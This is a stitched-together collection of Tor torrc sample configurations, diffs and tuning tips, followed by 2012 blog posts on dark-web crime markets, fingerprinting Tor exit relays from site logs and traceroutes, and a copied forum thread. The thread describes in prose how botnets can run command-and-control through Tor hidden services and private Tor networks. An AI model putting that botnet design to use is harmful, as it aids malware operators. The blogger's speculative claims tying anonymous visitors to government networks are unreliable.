## First entry that matches wins. If no SocksPolicy is set, we accept

## all (and only) requests from SocksListenAddress.

#SocksPolicy accept 192.168.0.0/16

#SocksPolicy reject *

 

## Logs go to stdout at level “notice” unless redirected by something

## else, like one of the below lines. You can have as many Log lines as

## you want.

##

## We advise using “notice” in most cases, since anything more verbose

## may provide sensitive information to an attacker who obtains the logs.

##

## Send all messages of level ‘notice’ or higher to /var/log/tor/notices.log

#Log notice file /var/log/tor/notices.log

## Send every possible message to /var/log/tor/debug.log

#Log debug file /var/log/tor/debug.log

## Use the system log instead of Tor’s logfiles

#Log notice syslog

## To send all messages to stderr:

#Log debug stderr

 

## Uncomment this to start the process in the background… or use

## –runasdaemon 1 on the command line. This is ignored on Windows;

## see the FAQ entry if you want Tor to run as an NT service.

#RunAsDaemon 1

 

## Tor only trusts directories signed with one of these keys, and

## uses the given addresses to connect to the trusted directory

## servers. If no DirServer lines are specified, Tor uses the built-in

## defaults (moria1, moria2, tor26), so you can leave this alone unless

## you need to change it.

#DirServer 18.244.0.188:9031 FFCB 46DB 1339 DA84 674C 70D7 CB58 6434 C437 0441

#DirServer 18.244.0.114:80 719B E45D E224 B607 C537 07D0 E214 3E2D 423E 74CF

#DirServer 62.116.124.106:9030 847B 1F85 0344 D787 6491 A548 92F9 0493 4E4E B85D

 

## The directory for keeping all the keys/etc. By default, we store

## things in $HOME/.tor on Unix, and in Application Data\tor on Windows.

#DataDirectory @LOCALSTATEDIR@/lib/tor

 

## The directory for keeping all the keys/etc. By default, we store

## things in $HOME/.tor on Unix, and in Application Data\tor on Windows.

#DataDirectory /var/lib/tor

 

## The port on which Tor will listen for local connections from Tor

## controller applications, as documented in control-spec.txt.

#ControlPort 9051

 

############### bypass open DNS ###############

##

## ACRYLIC DNS PROXY ==
## http://sourceforge.net/projects/acrylic/
##
## Step 1 INSTALL TOR
## Step 2 INSTALL ACRYLIC DNS PROXY

##

Acrylic is a local DNS proxy which improves the performance of your computer by caching the responses coming from your DNS servers. When you browse a Web page a portion of the loading time is dedicated to name resolution (usually from a few milliseconds to 1 second or even more) while the rest is dedicated to the transfer of the page contents to your browser. What Acrylic does is to reduce the time dedicated to name resolution for frequently visited addresses as close to zero as possible. With Acrylic you can also gracefully overcome short downtimes of your DNS servers without disrupting your work, because in this case you will at least be able to connect to your favourite sites and to your email server. In addition Acrylic can help you to effectively block unwanted ads prior to their download through the use of a custom HOSTS files, optimizing your navigation experience even further.

## Copy the following and paste it in TOR BROWSER\Data\TOR\torrc

## DNSPort 9053
## AutomapHostsOnResolve 1
## AutomapHostsSuffixes .exit,.onion

##

##

##

############### bypass open DNS ###############

############### This section is just for location-hidden services ###

## Look in …/hidden_service/hostname for the address to tell people.

## HiddenServicePort x y:z says to redirect a port x request from the

## client to y:z.

 

#HiddenServiceDir @LOCALSTATEDIR@/lib/tor/hidden_service/

#HiddenServicePort 80 127.0.0.1:80

 

#HiddenServiceDir @LOCALSTATEDIR@/lib/tor/other_hidden_service/

#HiddenServicePort 80 127.0.0.1:80

#HiddenServicePort 22 127.0.0.1:22

#HiddenServiceNodes moria1,moria2

#HiddenServiceExcludeNodes bad,otherbad

## Once you have configured a hidden service, you can look at the

## contents of the file “…/hidden_service/hostname” for the address

## to tell people.

##

## HiddenServicePort x y:z says to redirect requests on port x to the

## address y:z.

 

#HiddenServiceDir /var/lib/tor/hidden_service/

#HiddenServicePort 80 127.0.0.1:80

 

#HiddenServiceDir /var/lib/tor/other_hidden_service/

#HiddenServicePort 80 127.0.0.1:80

#HiddenServicePort 22 127.0.0.1:22

 

################ This section is just for relays ###################

## See https://www.torproject.org/docs/tor-doc-relay for details.

 

## A unique handle for your server.

 

#Nickname ididnteditheconfig

 

## The IP or FQDN for your server. Leave commented out and Tor will guess.

 

#Address noname.example.com

 

## Define these to limit the bandwidth usage of relayed (server)

## traffic. Your own traffic is still unthrottled.

## Note that RelayBandwidthRate must be at least 20 KB.

 

#RelayBandwidthRate 100 KBytes  # Throttle traffic to 100KB/s (800Kbps)

#RelayBandwidthBurst 200 KBytes # But allow bursts up to 200KB/s (1600Kbps)

 

## Contact info to be published in the directory, so we can contact you

## if your server is misconfigured or something else goes wrong.

#ContactInfo Random Person <nobody AT example dot com>

## You might also include your PGP or GPG fingerprint if you have one:

 

#ContactInfo 1234D/FFFFFFFF Random Person <nobody AT example dot com>

 

## Required: what port to advertise for Tor connections.

#ORPort 9001

## If you need to listen on a port other than the one advertised

## in ORPort (e.g. to advertise 443 but bind to 9090), uncomment the

## line below too. You’ll need to do ipchains or other port forwarding

## yourself to make this work.

 

#ORListenAddress 0.0.0.0:9090

 

## Uncomment this to mirror directory information for others. Please do

## if you have enough bandwidth.

#DirPort 9030 # what port to advertise for directory connections

## If you need to listen on a port other than the one advertised

## in DirPort (e.g. to advertise 80 but bind to 9091), uncomment the line

## below too. You’ll need to do ipchains or other port forwarding yourself

## to make this work.

 

#DirListenAddress 0.0.0.0:9091

 

## Uncomment this if you run more than one Tor server, and add the

## nickname of each Tor server you control, even if they’re on different

## networks. You declare it here so Tor clients can avoid using more than

## one of your servers in a single circuit. See

## http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#MultipleServers

 

#MyFamily nickname1,nickname2,…

 

## A comma-separated list of exit policies. They’re considered first

## to last, and the first match wins. If you want to _replace_

## the default exit policy, end this with either a reject *:* or an

## accept *:*. Otherwise, you’re _augmenting_ (prepending to) the

## default exit policy. Leave commented to just use the default, which is

## available in the man page or at https://www.torproject.org/documentation.html

##

## Look at https://www.torproject.org/faq-abuse.html#TypicalAbuses

## for issues you might encounter if you use the default exit policy.

##

## If certain IPs and ports are blocked externally, e.g. by your firewall,

## you should update your exit policy to reflect this — otherwise Tor

## users will be told that those destinations are down.

##

#ExitPolicy accept *:6660-6667,reject *:* # allow irc ports but no more

#ExitPolicy accept *:119 # accept nntp as well as default exit policy

#ExitPolicy reject *:* # no exits allowed

#

################ This section is just for bridge relays ##############

#

## Bridge relays (or “bridges” ) are Tor relays that aren’t listed in the

## main directory. Since there is no complete public list of them, even if an

## ISP is filtering connections to all the known Tor relays, they probably

## won’t be able to block all the bridges. Unlike running an exit relay,

## running a bridge relay just passes data to and from the Tor network —

## so it shouldn’t expose the operator to abuse complaints.

 

#ORPort 443

#BridgeRelay 1

#RelayBandwidthRate 50KBytes

#ExitPolicy reject *:*

 

File 2

################ This section is just for servers #####################

 

## NOTE: If you enable these, you should consider mailing your identity

## key fingerprint to the tor-ops, so we can add you to the list of

## servers that clients will trust. See the README for details.

 

## Required: A unique handle for this server

#Nickname ididnteditheconfig

 

## The IP or fqdn for this server. Leave blank and Tor will guess.

#Address noname.example.com

 

#ContactInfo 1234D/FFFFFFFF Random Person <nobody@example.com>

 

## Required: what port to advertise for tor connections

#ORPort 9001

## If you want to listen on a port other than the one advertised

## in ORPort, uncomment the line below. You’ll need to do ipchains

## or other port forwarding yourself to make this work.

#ORBindAddress 0.0.0.0:9090

 

## Uncomment this to mirror the directory for others (please do)

#DirPort 9030 # what port to advertise for directory connections

## If you want to listen on a port other than the one advertised

## in DirPort, uncomment the line below. You’ll need to do ipchains

## or other port forwarding yourself to make this work.

#DirBindAddress 0.0.0.0:9091

 

## A comma-separated list of exit policies. They’re considered first

## to last, and the first match wins. If you want to *replace*

## the default exit policy, end this with either a reject *:* or an

## accept *:*. Otherwise, you’re *augmenting* (prepending to) the

## default exit policy. Leave commented to just use the default.

#ExitPolicy accept *:6660-6667

#ExitPolicy reject 192.168.0.1:*

#ExitPolicy reject *:*

 

#BridgeRelay 1

#ExitPolicy reject *:*

 

File 3

Index: torrc.sample.in

===================================================================

RCS file: /home/or/cvsroot/src/config/torrc.sample.in,v

retrieving revision 1.31

retrieving revision 1.32

diff -u -d -r1.31 -r1.32

— torrc.sample.in 10 Nov 2004 00:14:02 -0000 1.31

+++ torrc.sample.in 12 Nov 2004 04:00:07 -0000 1.32

@@ -1,73 +1,76 @@

-# Configuration file for a typical tor user

+## Configuration file for a typical tor user

 

-# Replace this with “SocksPort 0″ if you don’t want clients to connect.

+## Replace this with “SocksPort 0″ if you don’t want clients to connect.

SocksPort 9050 # what port to advertise for application connections

SocksBindAddress 127.0.0.1 # accept connections only from localhost

#SocksBindAddress 192.168.0.1:9100 # listen on a chosen IP/port

 

-# Entry policies to allow/deny SOCKS requests based on IP address.

-# First entry that matches wins. If no SocksPolicy is set, we accept

-# all (and only) requests from SocksBindAddress.

-#

+## Entry policies to allow/deny SOCKS requests based on IP address.

+## First entry that matches wins. If no SocksPolicy is set, we accept

+## all (and only) requests from SocksBindAddress.

#SocksPolicy accept 192.168.0.1/16

#SocksPolicy reject *

 

-# Allow no-name routers (ones that the dirserver operators don’t

-# know anything about) in only these positions in your circuits.

-# Other choices (not advised) are entry,exit,introduction.

+## Allow no-name routers (ones that the dirserver operators don’t

+## know anything about) in only these positions in your circuits.

+## Other choices (not advised) are entry,exit,introduction.

AllowUnverifiedNodes middle,rendezvous

 

-# Logs go to stdout unless redirected by something else, like one of

-# the below lines, or –logfile on the command line.

-### Send all messages of level ‘warn’ or higher to @LOCALSTATEDIR@/log/tor/warnings

-#Log warn file @LOCALSTATEDIR@/log/tor/warnings

-### Send all debug and info messages to @LOCALSTATEDIR@/log/tor/debug

-#Log debug-info file @LOCALSTATEDIR@/log/tor/debug

-### Send all debug messages ONLY to @LOCALSTATEDIR@/log/tor/debug

-#Log debug-debug file @LOCALSTATEDIR@/log/tor/debug

-### To use the system log instead of Tor’s logfiles, uncomment these lines:

+## Logs go to stdout unless redirected by something else, like one of

+## the below lines.

+## Send all messages of level ‘warn’ or higher to @LOCALSTATEDIR@/log/tor/warnings

+#Log warn file @LOCALSTATEDIR@/log/tor/warnings.log

+## Send all debug and info messages to @LOCALSTATEDIR@/log/tor/debug

+#Log debug-info file @LOCALSTATEDIR@/log/tor/debug.log

+## Send all debug messages ONLY to @LOCALSTATEDIR@/log/tor/debug

+#Log debug-debug file @LOCALSTATEDIR@/log/tor/debug.log

+## To use the system log instead of Tor’s logfiles, uncomment these lines:

#Log notice syslog

-### To send all messages to stderr:

+## To send all messages to stderr:

#Log debug-err stderr

 

-# Uncomment this to start the process in the background… or use

-# –runasdaemon 1 on the command line.

+## Uncomment this to start the process in the background… or use

+## –runasdaemon 1 on the command line.

#RunAsDaemon 1

 

-# Tor only trusts directories signed with one of these keys, and

-# uses the given addresses to connect to the trusted directory

-# servers. If no DirServer lines are specified, Tor uses the built-in

-# defaults (moria1, moria2, tor26), so you can leave this alone unless

-# you need to change it.

+## Tor only trusts directories signed with one of these keys, and

+## uses the given addresses to connect to the trusted directory

+## servers. If no DirServer lines are specified, Tor uses the built-in

+## defaults (moria1, moria2, tor26), so you can leave this alone unless

+## you need to change it.

#DirServer 18.244.0.188:9031 FFCB 46DB 1339 DA84 674C 70D7 CB58 6434 C437 0441

#DirServer 18.244.0.114:80 719B E45D E224 B607 C537 07D0 E214 3E2D 423E 74CF

#DirServer 62.116.124.106:9030 847B 1F85 0344 D787 6491 A548 92F9 0493 4E4E B85D

 

-# The directory for keeping all the keys/etc. By default, we store

-# things in $HOME/.tor on Unix, and in Application Data\tor on Windows.

+## The directory for keeping all the keys/etc. By default, we store

+## things in $HOME/.tor on Unix, and in Application Data\tor on Windows.

#DataDirectory @LOCALSTATEDIR@/lib/tor

 

##################### Below is just for servers #####################

 

-## NOTE: If you enable these, you should consider mailing your

-## identity key fingerprint to the tor-ops, so we can verify

-## your configuration. See the README for details.

+## NOTE: If you enable these, you should consider mailing your identity

+## key fingerprint to the tor-ops, so we can add you to the list of

+## servers that clients will trust. See the README for details.

+

+## A unique handle for this server

+#Nickname ididnteditheconfig

+

+## The IP or fqdn for this server. Leave blank and Tor will guess.

+#Address noname.example.com

 

-#Nickname ididnteditheconfig       # A unique handle for this server

-#Address noname.example.com        # The IP or fqdn for this server

#ContactInfo 1234D/FFFFFFFF Random Person <nobody@example.com>

 

#ORPort 9001 # what port to advertise for tor connections

-# If you want to listen on a port other than the one advertised

-# in ORPort, uncomment the line below. You’ll need to do ipchains

-# or other port forwarding yourself to make this work.

+## If you want to listen on a port other than the one advertised

+## in ORPort, uncomment the line below. You’ll need to do ipchains

+## or other port forwarding yourself to make this work.

#ORBindAddress 0.0.0.0:9090

-# Uncomment this to mirror the directory for others (please do)

+## Uncomment this to mirror the directory for others (please do)

#DirPort 9030 # what port to advertise for directory connections

-# If you want to listen on a port other than the one advertised

-# in DirPort, uncomment the line below. You’ll need to do ipchains

-# or other port forwarding yourself to make this work.

+## If you want to listen on a port other than the one advertised

+## in DirPort, uncomment the line below. You’ll need to do ipchains

+## or other port forwarding yourself to make this work.

#DirBindAddress 0.0.0.0:9091

## A comma-separated list of exit policies. They’re considered first

File 4

############### This section is just for location-hidden services ###
64
65 ## Look in …/hidden_service/hostname for the address to tell people.
66 ## HiddenServicePort x y:z says to redirect a port x request from the
67 ## client to y:z.
68
69 #HiddenServiceDir /data/Data/projekte/DilloTor/tor-0.1.1.23/binary/var/lib/tor/hidden_service/
70 #HiddenServicePort 80 127.0.0.1:80
71
72 #HiddenServiceDir /data/Data/projekte/DilloTor/tor-0.1.1.23/binary/var/lib/tor/other_hidden_service/
73 #HiddenServicePort 80 127.0.0.1:80
74 #HiddenServicePort 22 127.0.0.1:22
75 #HiddenServiceNodes moria1,moria2
76 #HiddenServiceExcludeNodes bad,otherbad
77

File 5

— src/config/torrc.sample.in.orig 2007-01-27 23:41:23.000000000 +0000
+++ src/config/torrc.sample.in 2007-01-27 23:43:47.000000000 +0000
@@ -18,6 +18,11 @@
 ## With the default Mac OS X installer, Tor will look in ~/.tor/torrc or
 ## /Library/Tor/torrc
+## Default username and group the server will run as
+User tor
+Group tor
+
+PIDFile /var/run/tor/tor.pid
 ## Replace this with “SocksPort 0″ if you plan to run Tor only as a
 ## server, and not make any local application connections yourself.
@@ -46,6 +51,7 @@
 #Log notice syslog
 ## To send all messages to stderr:
 #Log debug stderr
+Log notice file /var/log/tor/tor.log
 ## Uncomment this to start the process in the background… or use
 ## –runasdaemon 1 on the command line. This is ignored on Windows;
@@ -55,6 +61,7 @@
 ## The directory for keeping all the keys/etc. By default, we store
 ## things in $HOME/.tor on Unix, and in Application Data\tor on Windows.
 #DataDirectory @LOCALSTATEDIR@/lib/tor
+DataDirectory   /var/lib/tor/data
 ## The port on which Tor will listen for local connections from Tor
 ## controller applications, as documented in control-spec.txt.

 

— a/src/config/torrc.sample.in
2 +++ b/src/config/torrc.sample.in
3 @@ -44,11 +44,11 @@ SocksListenAddress 127.0.0.1 # accept co
4  ## Uncomment this to start the process in the background… or use
5  ## –runasdaemon 1 on the command line. This is ignored on Windows;
6  ## see the FAQ entry if you want Tor to run as an NT service.
7 -#RunAsDaemon 1
8 +RunAsDaemon 1
9
10  ## The directory for keeping all the keys/etc. By default, we store
11  ## things in $HOME/.tor on Unix, and in Application Data\tor on Windows.
12 -#DataDirectory @LOCALSTATEDIR@/lib/tor
13 +DataDirectory @LOCALSTATEDIR@/lib/tor
14
15  ## The port on which Tor will listen for local connections from Tor
16  ## controller applications, as documented in control-spec.txt.
17 @@ -168,3 +168,5 @@ SocksListenAddress 127.0.0.1 # accept co
18  #BridgeRelay 1
19  #ExitPolicy reject *:*
20
21 +User tor
22 +PidFile @LOCALSTATEDIR@/run/tor/tor.pid

File 6

Configuration tips

Using the same exit for persistant connections

Some websites will log you out if you re-visit (while loggined in using a cookie to identify you) from a different IP. Tor has a feature called long lived ports. You could add the following to torrc to make connections to given ports use the same circut for a long period of time:

LongLivedPorts 80,23,21,22,706,1863,5050,5190,5222,5223,6667,8300,8888

A good alternative to LongLivedPorts is to use MapAddress for given sites. It allows you to make sure every connection to a given site goes through the same connection. This is also a good option if you need given sites to be visited from a given country.

For example,

MapAddress www.nsa.gov www.nsa.gov.nadia.exit

will make all visits to www.nsa.gov always use the edit node nadia, which is located in the US. There are anonymity issues with this; if you’re the only one using it then www.nsa.gov can at least figure out that it’s the same guy who’s visiting when connections are coming from that exit node.

=== Make Tor act faster ====

It is also possible to make Tor connections seem faster by setting CircuitBuildTimeout. Setting this number lower than the default (60 seconds) makes Tor give up and try other paths if it takes longer than the limit to build a circut. A circut which takes 50 seconds to build will be slower than a circut that takes 15 seconds to build. For example, you could set:

CircuitBuildTimeout 10

However, it must be mentioned that you will be using a whole lot more different servers if you allow circuts who take 50 seconds to build than if you set the limit to 10 seconds. There isn’t much solid research on exactly how this impacts traffic analysis resistance, but you’re – generally speaking – better off using a lot of slow servers than a few fast ones.

File 7

https://svn.torproject.org/svn/tor/tags/tor-0_0_9_5/src/config/torrc.sample.in

08/28/12

Black Market in Tor Growing

gAtO been down sIcK so I had to slow down so I’ve been reading underground looking around and the .onion network is beginning to take shape as more users explore it. Let’s just say it’s growing. In the Black Market things are looking up per say, more newbies and more scams with money mules, shipping mules, bot’s rentals and creation and trade. Here are two different crime recruitment points one the physical/ one code / and they are taking advantage of the economics of the situation.

People are losing their homes and eviction is coming “well I can do this for these guys online and I can make a little money and pay a few bills buy some food”. Grooming these new cyber shipping mules is a full time job, but they select and groom some for more and more /—then hit’s them with money mules transactions and they’re hooked. Greed / Pay the rent/ Now these guy know that as the money mule get’s more and more orders right the amount will go up and when they will bail with the criminals money is anyones guess, but by this time they have funneled so much money or goods thru these mules that they are throw away at the end of the life cycle of use. You also have the new code warriors watching and trading in botware working in Tor. Why because it works -/ and other have seen the .onion network as a new area were if they keep quite nobody can find them. If you keep quite nobody will know what your doing and that’s why Tor is working for the bad guys – Why can’t it work for the good guy’s when are we going to start using the best technology for the best job and leave all this other politics alone.

Cyber crime is working in the .onion but when will the law catch up, never I guess 2 many lost opportunities when they treat everyone like shit, just like the ugNazi CC bust- do they have a clue how many other CC sites are out there working in Tor and/or the surface web… . Silk road is all the rage while Black Market Reload sells explosives and drugs but come on the school boys in Cornell and other places are putting their finger into Tor to defeat Tor-attack the Tor Network Yeah – Yeah- “What If- What If -does not work in Tor students”, as they go for Silk Road the hundred of other places were real commercial cyber crooks get away with everything they can is working hard for the money boy’s and girls…. One service takes stolen credit cards to buy goods and directly ship products to the Ebay customer who purchase it and they pay them clean money while their new iPad was purchased with a stolen CC. It’s just these newbies in Tor think they are hip and cool in the surface but in the Tor network the good old boy’s that were there in the beginning are watching with a grim silly smile, knowing but not telling… gATO oUT 

07/19/12

Fingerprint Tor or Government Anonymized Network

How To  Fingerprint Anonymized Network visiting your website

gAtO hAs - been learning about the Tor-.onion network and one thing I wanted to understand was how China, Iran and Syria block the Onion-Router (OR). / Fingerprint Profile – I have read in the Tor wiki about the Tor signal simulating a Skypes fingerprint to hide in the clutter of the web. So how do I figure this out? Ok with WireShark I can capture the packets and check out the signature and fingerprint of a Tor anoymized network. This is one way.

Another way – just check out your website statistics and look for anyone that visited your site that does not have a country code.  From  observation of my site uscyberlabs.com I have found a pattern lately most “no country flag” indicates a Tor OR or a private – Anonymized Network. Not all of them are Tor so some of the others are the most interesting because they are anonymized but not Tor, I2P maybe, government networks -mAyBe -sI -nO gAtO is a gAtO let’s check this out

I have a few SEO packages on my site to check out the back-end statistics of the site. This give you information about your web visitor like the referal of the site that you came from, The OS, the platform and the Country were you came from, your geo-Location. One of the things that Tor does for you is prevent people from knowing your IP / geo-location. So guess what??? people have been visiting my site using not just Tor-networks – c00l b3ans, but so what else can I find out about these other  non-Tor relay— so I started digging around and this is what I found about some of these exit-relays… gAtO wArNiNg - I have to hold back some information about governments anonymized networks due to privacy and vulnerabilities possibilities.

A fingerprint of NO COUNTRY FLAGS – on my logs show’s Tor Exit-Relay type anonymized network according to the Visitor statistics: Figure 1(below) a snapshot of my log from ExtremeTracking.com –//  You noticed the ip or names of referred site with no country flags. Example: 217.79.231.13 for-exit0-readme.dfi.se – tor21.anonymizer.ccc.de - and a few more —

 

I decide to -Trust but Verifythe security Dude’s secret motto -mEoW

I went to the command line:

-curl tor21.anonymizer.ccc.de   – it came back with information that this exit-relay come’s from the Tor-Project personal relays- and it’s private-relay because I checked it against and guess what it’s hosted by there dear friends Chaos Computer Club – that brings back the “way-back machine” to the old day of real hacking but these are the guy’s from Germany and they are good friends of the Tor project, so this is a trusted Tor exit relay for the Tor project..// interesting // they were reading my “recon the deep web article

curl tor21.anonymizer.ccc.de

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-<ol>

<li><a href=”https://www.torproject.org/overview.html“>Tor Overview</a></li>

<li><a href=”https://www.torproject.org/faq-abuse.html“>Tor Abuse FAQ</a></li>

<li><a href=”https://www.torproject.org/eff/tor-legal-faq.html“>Tor Legal FAQ</a></li>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-</ol>

IP – 31.172.30.4 – All (Onion Router) OR from Chaos seem to be – OS window 7

27 Jun, Wed, 14:02:33 tor21.anonymizer.ccc.de uscyberlabs.com/blog/2012/02/05/recon-deep-web/

 

 I found out all 3 Tor OR-relays had this signature – No Flag Fingerprint = TOR/i2p = secure traffic/anoymized  traffic-

***  -Trust but Verify –/ What caught my attention in the log was  141.101.70.66it is owned by nLayer Communication    — Who is nLayer they provides Internet connectivity solutions. The company provides IP transit, data transportation, and managed networking services to governments agencies. CIA, FBI, NSA any alphabet soup agency that you want from the .gov folks.

How did we get from 141.101.70.66 to nLayer: a traceroute- command

[2] traceroute to 141.101.70.66 (141.101.70.66), 64 hops max, 52 byte packets

1  10.2.120.1 (10.2.120.1)  11.513 ms  10.851 ms  8.521 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (68.9.8.13)  10.120 ms  11.272 ms  7.912 ms

3  ip98-190-33-21.ri.ri.cox.net (98.190.33.21)  11.896 ms  9.496 ms  12.044 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (98.190.33.20)  10.429 ms  13.194 ms  11.063 ms

5  nyrkbprj01-ae2.0.rd.ny.cox.net (68.1.1.173)  18.038 ms  15.177 ms  14.140 ms

6  ae0-50g.cr1.nyc3.us.nlayer.net (69.31.95.193)  16.279 ms  17.128 ms  17.859 ms

7  xe-7-3-0.cr1.lhr1.uk.nlayer.net (69.22.142.133)  87.076 ms  83.085 ms  82.096 ms

8  ae1-70g.ar1.lhr1.uk.nlayer.net (69.22.139.63)  83.856 ms  84.420 ms  85.732 ms

as13335.xe-4-0-6.ar1.lhr1.uk.nlayer.net (63.141.223.42)  82.774 ms  102.143 ms  82.082 ms

10  141.101.70.66 (141.101.70.66)  83.317 ms  83.772 ms  82.424 ms

And of course this all goes thru some dummy corporate stuff to fool anyone // if you dig a little // I guess Global Telecom & Technology, Inc. (“GTT”), (OTCBB: GTLT.OB – // – have you seen their stock almost double since the US government stepped up it’s cyber position- good cyber investment I guess–// ), a global network operator providing managed data services to large enterprise, government and carrier customers in over 80 countries worldwide, today announced the acquisition of privately-held, Chicago-based nLayer Communications, Inc. -government and carrier customers/ government and carrier customers / government and carrier customers…//

…—…

So gaTo what does all this mean / a simple website statistics can help you see your anonymized visitors — No Flag Fingerprint = TOR/i2p = secure traffic/anoymized  traffic- / or it could be from a government site -knock, knock, knocking at your website door- also or business spying your site, your information. gAtO think it’s a waste of time because gAtO is wasted most of the time when he writes this stuff- RI MMP program, life sucks big time.

Besides the Tor or I2P  traffic// the pattern in the fingerprint that show no country flag: — secure traffic/anoymized — this is open source software that governments have modified for their own skunk work… Governments have taken the 3rd level Tor-Onion routing (code) and has their own similar network, but under the hood is the same core code – “ no Flag” show’s root code flaw, So any webmaster that has a website can find Tor like Exit-Relays or govs, watching you watching them –

: As long as the visitor is visiting from inside the matrix of a anoymized network they must use and Exit-Node-no country flag - GOTCHA—gATO ouT

by the way Chaos Computer Club 31.172.30.4 nice Tor- exit-node

 

gAtOmAlO lAb nOtEs –=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

traceroute 31.172.30.4

traceroute to 31.172.30.4 (31.172.30.4), 64 hops max, 52 byte packets

1  10.2.120.1 (10.2.120.1)  46.027 ms  12.175 ms  9.976 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (68.9.8.13)  15.444 ms  11.472 ms  10.996 ms

3  ip98-190-33-21.ri.ri.cox.net (98.190.33.21)  10.043 ms  9.272 ms  10.127 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (98.190.33.20)  9.597 ms  9.633 ms  16.782 ms

5  68.1.4.133 (68.1.4.133)  21.272 ms  22.538 ms  21.357 ms

6  ae-6.r21.asbnva02.us.bb.gin.ntt.net (129.250.3.113)  42.541 ms  50.629 ms  61.680 ms

7  ae-2.r23.amstnl02.nl.bb.gin.ntt.net (129.250.2.145)  133.403 ms  162.975 ms  137.493 ms

8  ae-2.r02.amstnl02.nl.bb.gin.ntt.net (129.250.2.159)  136.255 ms  128.778 ms  133.927 ms

9  xe-4-1.r02.dsdfge01.de.bb.gin.ntt.net (129.250.2.65)  142.335 ms  142.499 ms  141.396 ms

10  xe-3-4.r00.dsdfge02.de.bb.gin.ntt.net (129.250.5.173)  133.058 ms  128.793 ms *

11  213.198.77.122 (213.198.77.122)  132.148 ms  136.187 ms  132.329 ms

12  tor21.anonymizer.ccc.de (31.172.30.4)  123.563 ms  130.866 ms  121.906 ms —

 

traceroute 199.48.147.35

traceroute to 199.48.147.35 (199.48.147.35), 64 hops max, 52 byte packets

1  10.2.120.1 (10.2.120.1)  1842.973 ms  9.712 ms  10.324 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (68.9.8.13)  9.961 ms  10.751 ms  10.437 ms

3  ip98-190-33-21.ri.ri.cox.net (98.190.33.21)  12.393 ms  10.226 ms  9.773 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (98.190.33.20)  19.731 ms  9.270 ms  18.419 ms

5  nyrkbprj01-ae2.0.rd.ny.cox.net (68.1.1.173)  15.479 ms  15.045 ms  16.067 ms

6  ae0-50g.cr1.nyc3.us.nlayer.net (69.31.95.193)  15.114 ms  22.195 ms  16.909 ms

7  ae2-70g.cr1.ewr1.us.nlayer.net (69.31.95.145)  16.976 ms  28.552 ms  15.767 ms

8  xe-3-1-0.cr1.sjc1.us.nlayer.net (69.22.142.137)  90.901 ms  104.251 ms  90.386 ms

9  ae1-40g.ar2.sjc1.us.nlayer.net (69.22.143.118)  97.274 ms  91.747 ms  92.165 ms

10  as18779.xe-4-0-4.ar2.sjc1.us.nlayer.net (69.22.153.94)  91.277 ms  104.404 ms  100.544 ms

11  gw-ao.sjc01.appliedops.net (173.245.68.18)  98.566 ms  92.947 ms  91.660 ms

12  tor-exit-router35-readme.formlessnetworking.net (199.48.147.35)  93.154 ms  92.201 ms  92.769 ms

 

 traceroute 217.79.231.13

traceroute to 217.79.231.13 (217.79.231.13), 64 hops max, 52 byte packets

1  10.2.120.1 (10.2.120.1)  19.522 ms  35.384 ms  9.940 ms

2  wwcksysc01-gex0103000.ri.ri.cox.net (68.9.8.13)  12.016 ms  11.162 ms  9.829 ms

3  ip98-190-33-21.ri.ri.cox.net (98.190.33.21)  13.815 ms  8.970 ms  9.637 ms

4  provdsrj01-ae3.0.rd.ri.cox.net (98.190.33.20)  11.118 ms  11.123 ms  9.964 ms

5  68.1.4.133 (68.1.4.133)  20.776 ms  20.920 ms  61.446 ms

6  ttc.tenge11-1.br02.ldn01.pccwbtn.net (63.218.54.38)  95.216 ms  107.984 ms  94.783 ms

7  217.150.59.202 (217.150.59.202)  149.863 ms  149.865 ms  149.539 ms

8  vl554-gvrn-sr1.msk1.net.lancronix.ru (217.79.224.67)  158.159 ms  165.395 ms  157.553 ms

217.79.231.13 (217.79.231.13)  157.467 ms  157.215 ms  166.376 ms

 

07/17/12

Are Criminals Using Tor-onion- Controlled Botnet

gAtO aSkEd – are criminals using Tor-.onion network to run botnets?  I started searching in the deep dark web and found some interesting discussion threads. I copied them down from different places in onion land. But a simple search in “the abyss-search engines”— http://nstmo7lvh4l32epo.onion — dark web search engine can let you see a few places were Tor-controlled botnets are being sold, discussed and a place were you can ask questions and get back some real answers since they’re in the .onion.

So this may shed some light on this what hackers and criminals are talking about, and see how the bad guy’s are doing it- I just want to learn. -gAtO oUt 

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

  • Is there any good reason for a botnet not to contact an onionland server for C&C? It seems like that would make it harder to shut down, since you can’t find the server. What reason am I missing for this not being done more often?
  • This is actually very simple to implement. I’ve been working on a project that does this for a few months that’s pretty much complete.
  • My bot uses a hidden service to pull down a custom torrc, this file contains information on private directory servers which it then uses to connect to a private tor network.
  • The bot can choose weather to stay on the public tor network or connect to a privet network depending on what the C&C tells it to do.
  • If it connects to the private network it does a check to see if the client machine is hosted behind a NAT, if it’s not it becomes a relay and exit node.
  • I’m a newbie coder and wrote this in C so it is very easy to do. I’m just in the process of porting the whole thing over to linux atm.
  • The most obvious way to do this would be to install Tor on compromised systems and have the bots set up to issue their commands through Tor.
  • Another way would be to just run the C&C server on Tor and have the bots use a tor to web proxy, either a public one or you could set up your own on compromised servers. The downside with this approach is that it would be a lot easier to block and shut down.
  • A third option is to run your own Tor network and have the clients with higher bandwidth and up-time act as relays. This would seem like the most difficult approach and would require you to run your own root server which would lessen the resilience of the botnet.
  • I prefer the idea of using the normal Tor network with bots acting as clients only. This option seems like it would be pretty easy to set up and would insulate you from a lot of the risks normally associated with running a botnet. I’m not sure if this would require much modification to the Tor code.
